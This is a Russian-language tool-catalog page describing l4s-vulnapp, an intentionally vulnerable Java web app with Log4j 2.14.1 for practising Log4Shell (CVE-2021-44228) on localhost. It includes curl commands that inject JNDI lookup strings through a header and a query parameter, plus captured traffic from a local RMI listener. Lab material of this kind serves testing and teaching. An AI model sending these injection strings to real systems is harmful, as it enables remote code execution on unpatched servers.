Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
l4s-vulnapp — Это потенциально уязвимое Java веб-приложение, содержащее Log4j, подверженное уязвимости log4shell (CVE-2021-44228). | Kitploit
Инструменты/GitHubGitHub/ktokkawu/l4s-vulnapp
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubktokkawu/l4s-vulnapp

l4s-vulnapp

Это потенциально уязвимое Java веб-приложение, содержащее Log4j, подверженное уязвимости log4shell (CVE-2021-44228).

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимое приложение Log4Shell (l4s-vulnapp)

Это потенциально уязвимое Java-веб-приложение, содержащее Log4j(2.14.1), подверженное уязвимости log4shell(CVE-2021-44228).

Проверенная среда и различные версии

  • AdoptOpenJDK 17.0.10+7
  • Gradle 8.6
  • Gretty 4.1.2
  • Apache Tomcat 10.1.15
  • Apache Log4j Core 2.14.1

Подготовка

  • Скачайте и распакуйте zip-файл AdoptOpenJDK.
  • Установите переменные PATH и JAVA_HOME.
  • Выполните команду java --version, чтобы проверить, что AdoptOpenJDK работает правильно.

[Примечание]
Если вы хотите изменить версию JDK, порт Tomcat и т.д., отредактируйте build.gradle.

Сборка и запуск

Выполните обертку Gradle с помощью build.gradle.

root@kitploit:~
# on Linux
./gradlew appRun

# on Windows
.\gradlew.bat appRun

Главный URL:

root@kitploit:~
http://localhost:8080/l4s-vulnapp/

[Примечание]
Log4Shell срабатывает только когда приложение выполняет логирование с помощью Log4j.
Например, при доступе к следующему URL будет выполнен Log4Shell.

root@kitploit:~
http://localhost:8080/l4s-vulnapp/servlet

Вы можете проверить Log4Shell, изменив значение "x-param" или добавив заголовок "x-log" в HTTP-запрос при доступе к ней.
Эти параметры будут залогированы Log4j.
Однако это сработает только если на локальном хосте:8081 работает слушающий сервер.

root@kitploit:~
curl http://localhost:8080/l4s-vulnapp/servlet -H 'x-log: ${jndi:rmi://localhost:8081/test.txt}'
curl -X GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D

Результаты проверки

  • HTTP Request

    root@kitploit:~
    GET http://localhost:8080/l4s-vulnapp/servlet?x-param=%24%7Bjndi%3Armi%3A%2F%2Flocalhost%3A8081%2Ftest.txt%7D HTTP/1.1
    Host: localhost:8080
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)   Chrome/122.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/  *;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:8080/l4s-vulnapp/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: ja,en-US;q=0.9,en;q=0.8
    
    
    
  • HTTP Response

    root@kitploit:~
    HTTP/1.1 200
    Content-Type: text/plain;charset=utf-8
    Content-Length: 62
    Date: Fri, 15 Mar 2024 18:42:56 GMT
    Keep-Alive: timeout=60
    Connection: keep-alive
    
    Hello
    Logging to console using vulnerable Log4j2 by parameter
    
  • RMI Request by l4s-vulnapp

    root@kitploit:~
    2024/03/16 03:42:46: [Start] Receive Server for Log4Shell.
    2024/03/16 03:42:46: [Note] Listening on IP: "localhost" Port: 8081
    2024/03/16 03:42:55: [Note] Requested from IP: "127.0.0.1" Port: 53282)
    2024/03/16 03:42:55: [Hex data] ===== start =====
    2024/03/16 03:42:56: 00000000   4A 52 4D 49 00 02 4B 00 00 00 00 00 00 00 00 00  JRMI..K.........
    2024/03/16 03:42:56: 00000010   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    2024/03/16 03:42:56: [Hex data] =====  end  =====
    2024/03/16 03:42:56: [Raw data] ===== start =====
    2024/03/16 03:42:56: JRMI
    2024/03/16 03:42:56: [Raw data] =====  end  =====
    

Опция

l4s-ls.ps1 запускает слушающий сервер, выполните этот скрипт в Windows PowerShell/Командной строке.
Этот сервер принимает бинарные коммуникации, такие как LDAP и RMI, и может отображать содержимое этих коммуникаций в шестнадцатеричном и сыром виде.
Если скрипт работает некорректно, используйте Ctrl + C для остановки.

[Предупреждение]
При первом запуске этого скрипта необходимо выбрать "Частная сеть" в всплывающем окне Windows.

root@kitploit:~
PowerShell -ExecutionPolicy RemoteSigned .\l4s-ls.ps1 -p 8081

Ссылки

  • GitHub - tothi/log4shell-vulnerable-app
  • ももいろテクノロジー - PowerShellでnc(netcat)を書いてみる (2015/4/16)
Скачать инструмент